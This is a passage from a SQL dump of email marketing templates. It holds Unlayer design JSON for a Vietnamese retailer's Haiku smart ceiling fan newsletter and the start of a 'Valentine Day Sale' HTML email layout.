40px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1607002319908-vvb2.png\\\",\\\"width\\\":600,\\\"height\\\":48},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_7\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_13\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_10\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"opHjyGdo4n\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"5EjQAT1In3\\\",\\\"contents\\\":[{\\\"id\\\":\\\"fa-SDaQMps\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 10px 30px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#727171\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_11\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong>SMART CEILING FAN, SMART MODES<\\/strong><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"SMsQFcA9L4\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 10px 30px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"150%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_12\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 150%;\\\\\\\">Haiku can mimic a gentle breeze, save energy, adjust for optimal sleep, and run on a timer\\u2014all through the included remote or the Big Ass Fans Haiku mobile app.<\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_12\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}},{\\\"id\\\":\\\"aVoSxPEcGT\\\",\\\"contents\\\":[{\\\"id\\\":\\\"0dAzzodDxa\\\",\\\"type\\\":\\\"video\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 30px\\\",\\\"anchor\\\":\\\"\\\",\\\"video\\\":{\\\"url\\\":\\\"https:\\/\\/youtu.be\\/AjYMiqVCkrw?lis\\\",\\\"thumbnail\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677123215015-video_youtube_AjYMiqVCkrw.jpg\\\",\\\"videoId\\\":\\\"AjYMiqVCkrw\\\",\\\"type\\\":\\\"youtube\\\"},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_video_1\\\",\\\"htmlClassNames\\\":\\\"u_content_video\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_14\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_9\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"THUwYakHTm\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"kwzqhG799A\\\",\\\"contents\\\":[{\\\"id\\\":\\\"3tEuovNfbn\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"0px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"20px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_3\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"R2C4DOPmwe\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677296625467-quet_BR_code_2023.jpg\\\",\\\"width\\\":800,\\\"height\\\":491},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_8\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_17\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#bfd8d2\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_13\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"OL5bSnxx7M\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"jz40CXaHYv\\\",\\\"contents\\\":[{\\\"id\\\":\\\"zFw374rru6\\\",\\\"type\\\":\\\"social\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"40px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"icons\\\":{\\\"iconType\\\":\\\"circle-black\\\",\\\"icons\\\":[{\\\"url\\\":\\\"https:\\/\\/linkedin.com\\/\\\",\\\"name\\\":\\\"LinkedIn\\\"},{\\\"url\\\":\\\"https:\\/\\/twitter.com\\/\\\",\\\"name\\\":\\\"Twitter\\\"},{\\\"url\\\":\\\"https:\\/\\/instagram.com\\/\\\",\\\"name\\\":\\\"Instagram\\\"},{\\\"url\\\":\\\"https:\\/\\/youtube.com\\/\\\",\\\"name\\\":\\\"YouTube\\\"}],\\\"editor\\\":{\\\"data\\\":{\\\"showDefaultIcons\\\":true,\\\"showDefaultOptions\\\":true,\\\"customIcons\\\":[],\\\"customOptions\\\":[]}}},\\\"align\\\":\\\"center\\\",\\\"spacing\\\":15,\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_social_1\\\",\\\"htmlClassNames\\\":\\\"u_content_social\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"YGvjojNYO8\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#333333\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"180%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_14\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 180%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 21.6px;\\\\\\\"><strong><span style=\\\\\\\"line-height: 21.6px;\\\\\\\">GI\\u1ea2I PH\\u00c1P L\\u00c0M M\\u00c1T TO\\u00c0N DI\\u1ec6N KH\\u00d4NG GIAN NH\\u00c0 \\u1ede - V\\u0102N PH\\u00d2NG - NH\\u00c0 X\\u01af\\u1edeNG C\\u00d4NG NGHI\\u1ec6P<\\/span><\\/strong><\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 180%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 21.6px;\\\\\\\"><strong>SR THU DUC: <\\/strong>184 Tran Luu, An Phu, Thu Duc, HCM<\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 180%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 21.6px;\\\\\\\"><strong>SR QU\\u1eacN 7: <\\/strong>812 Happy Valley, Nguyen Van Linh, Tan Phong, District 7, HCM<\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 180%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 21.6px;\\\\\\\">WIT.\\u00a0 All rights reserved. <\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 180%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 21.6px;\\\\\\\">Tax: 0315778682<\\/span><br \\/><span style=\\\\\\\"font-size: 12px; line-height: 21.6px;\\\\\\\"><a rel=\\\\\\\"noopener\\\\\\\" href=\\\\\\\"https:\\/\\/hogiaphat.vn\\/lien-he\\\\\\\" target=\\\\\\\"_blank\\\\\\\" data-u-link-value=\\\\\\\"eyJuYW1lIjoid2ViIiwiYXR0cnMiOnsiaHJlZiI6Int7aHJlZn19IiwidGFyZ2V0Ijoie3t0YXJnZXR9fSJ9LCJ2YWx1ZXMiOnsiaHJlZiI6Imh0dHBzOi8vaG9naWFwaGF0LnZuL2xpZW4taGUiLCJ0YXJnZXQiOiJfYmxhbmsifX0=\\\\\\\"><span style=\\\\\\\"text-decoration: underline; font-size: 12px; line-height: 21.6px;\\\\\\\">Manage Preferences<\\/span> <\\/a>| <a rel=\\\\\\\"noopener\\\\\\\" href=\\\\\\\"https:\\/\\/haiku.hogiaphat.vn\\\\\\\" target=\\\\\\\"_blank\\\\\\\" data-u-link-value=\\\\\\\"eyJuYW1lIjoid2ViIiwiYXR0cnMiOnsiaHJlZiI6Int7aHJlZn19IiwidGFyZ2V0Ijoie3t0YXJnZXR9fSJ9LCJ2YWx1ZXMiOnsiaHJlZiI6Imh0dHBzOi8vaGFpa3UuaG9naWFwaGF0LnZuIiwidGFyZ2V0IjoiX2JsYW5rIn19\\\\\\\"><span style=\\\\\\\"text-decoration: underline; font-size: 12px; line-height: 21.6px;\\\\\\\">View in browser<\\/span>\\u00a0<\\/a><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_16\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#bfd8d2\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_12\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}}],\\\"values\\\":{\\\"popupPosition\\\":\\\"center\\\",\\\"popupWidth\\\":\\\"600px\\\",\\\"popupHeight\\\":\\\"auto\\\",\\\"borderRadius\\\":\\\"10px\\\",\\\"contentAlign\\\":\\\"center\\\",\\\"contentVerticalAlign\\\":\\\"center\\\",\\\"contentWidth\\\":\\\"600px\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Montserrat\\\",\\\"value\\\":\\\"\'Montserrat\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Montserrat:400,700\\\",\\\"defaultFont\\\":true},\\\"textColor\\\":\\\"#000000\\\",\\\"popupBackgroundColor\\\":\\\"#FFFFFF\\\",\\\"popupBackgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"cover\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"popupOverlay_backgroundColor\\\":\\\"rgba(0, 0, 0, 0.1)\\\",\\\"popupCloseButton_position\\\":\\\"top-right\\\",\\\"popupCloseButton_backgroundColor\\\":\\\"#DDDDDD\\\",\\\"popupCloseButton_iconColor\\\":\\\"#000000\\\",\\\"popupCloseButton_borderRadius\\\":\\\"0px\\\",\\\"popupCloseButton_margin\\\":\\\"0px\\\",\\\"popupCloseButton_action\\\":{\\\"name\\\":\\\"close_popup\\\",\\\"attrs\\\":{\\\"onClick\\\":\\\"document.querySelector(\'.u-popup-container\').style.display = \'none\';\\\"}},\\\"backgroundColor\\\":\\\"#fdf4ef\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"preheaderText\\\":\\\"\\\",\\\"linkStyle\\\":{\\\"body\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_body\\\",\\\"htmlClassNames\\\":\\\"u_body\\\"}}},\\\"schemaVersion\\\":12}\"', '', 0, '2022-08-18 21:19:50');
INSERT INTO `tblma_email_templates` (`id`, `name`, `color`, `category`, `published`, `language`, `data_html`, `data_design`, `description`, `addedfrom`, `dateadded`) VALUES
(2, 'Valentine Day Sale', '', 0, 1, 'english', '\"<!DOCTYPE HTML PUBLIC \\\"-\\/\\/W3C\\/\\/DTD XHTML 1.0 Transitional \\/\\/EN\\\" \\\"http:\\/\\/www.w3.org\\/TR\\/xhtml1\\/DTD\\/xhtml1-transitional.dtd\\\">\\r\\n<html xmlns=\\\"http:\\/\\/www.w3.org\\/1999\\/xhtml\\\" xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:o=\\\"urn:schemas-microsoft-com:office:office\\\">\\r\\n<head>\\r\\n<!--[if gte mso 9]>\\r\\n<xml>\\r\\n  <o:OfficeDocumentSettings>\\r\\n    <o:AllowPNG\\/>\\r\\n    <o:PixelsPerInch>96<\\/o:PixelsPerInch>\\r\\n  <\\/o:OfficeDocumentSettings>\\r\\n<\\/xml>\\r\\n<![endif]-->\\r\\n  <meta http-equiv=\\\"Content-Type\\\" content=\\\"text\\/html; charset=UTF-8\\\">\\r\\n  <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\">\\r\\n  <meta name=\\\"x-apple-disable-message-reformatting\\\">\\r\\n  <!--[if !mso]><!--><meta http-equiv=\\\"X-UA-Compatible\\\" content=\\\"IE=edge\\\"><!--<![endif]-->\\r\\n  <title><\\/title>\\r\\n  \\r\\n    <style type=\\\"text\\/css\\\">\\r\\n      @media only screen and (min-width: 620px) {\\r\\n  .u-row {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    vertical-align: top;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-50 {\\r\\n    width: 300px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-100 {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n\\r\\n}\\r\\n\\r\\n@media (max-width: 620px) {\\r\\n  .u-row-container {\\r\\n    max-width: 100% !important;\\r\\n    padding-left: 0px !important;\\r\\n    padding-right: 0px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    min-width: 320px !important;\\r\\n    max-width: 100% !important;\\r\\n    display: block !important;\\r\\n  }\\r\\n  .u-row {\\r\\n    width: calc(100% - 40px) !important;\\r\\n  }\\r\\n  .u-col {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col > div {\\r\\n    margin: 0 auto;\\r\\n  }\\r\\n}\\r\\nbody {\\r\\n  margin: 0;\\r\\n  padding: 0;\\r\\n}\\r\\n\\r\\ntable,\\r\\ntr,\\r\\ntd {\\r\\n  vertical-align: top;\\r\\n  border-collapse: collapse;\\r\\n}\\r\\n\\r\\np {\\r\\n  margin: 0;\\r\\n}\\r\\n\\r\\n.ie-container table,\\r\\n.mso-container table {\\r\\n  table-layout: fixed;\\r\\n}\\r\\n\\r\\n* {\\r\\n  line-height: inherit;\\r\\n}\\r\\n\\r\\na[x-apple-data-detectors=\'true\'] {\\r\\n  color: inherit !important;\\r\\n  text-decoration: none !important;\\r\\n}\\r\\n\\r\\ntable, td { color: #000000; } #u_body a { color: #0000ee; text-decoration: underline; }\\r\\n    <\\/style>\\r\\n  \\r\\n  \\r\\n\\r\\n<!--[if !mso]><!--><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Playfair+Display:400,700&display=swap\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><!--<![endif]-->\\r\\n\\r\\n<\\/head>\\r\\n\\r\\n<body class=\\\"clean-body u_body\\\" style=\\\"margin: 0;padding: 0;-webkit-text-size-adjust: 100%;background-color: #e1d0c6;color: #000000\\\">\\r\\n  <!--[if IE]><div class=\\\"ie-container\\\"><![endif]-->\\r\\n  <!--[if mso]><div class=\\\"mso-container\\\"><![endif]-->\\r\\n  <table id=\\\"u_body\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;min-width: 320px;Margin: 0 auto;background-color: #e1d0c6;width:100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\">\\r\\n  <tbody>\\r\\n  <tr style=\\\"vertical-align: top\\\">\\r\\n    <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n    <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td align=\\\"center\\\" style=\\\"background-color: #e1d0c6;\\\"><![endif]-->\\r\\n    \\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"background-color: #a47e6b;width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #a47e6b;height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:15px 10px 5px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1612261701794-solidarity1.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 64px;\\\" width=\\\"64\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 10px 15px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #ffffff; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong><span style=\\\"font-size: 16px; line-height: 22.4px;\\\">LOGO<\\/span><\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #ebd4ca;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #ebd4ca;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" 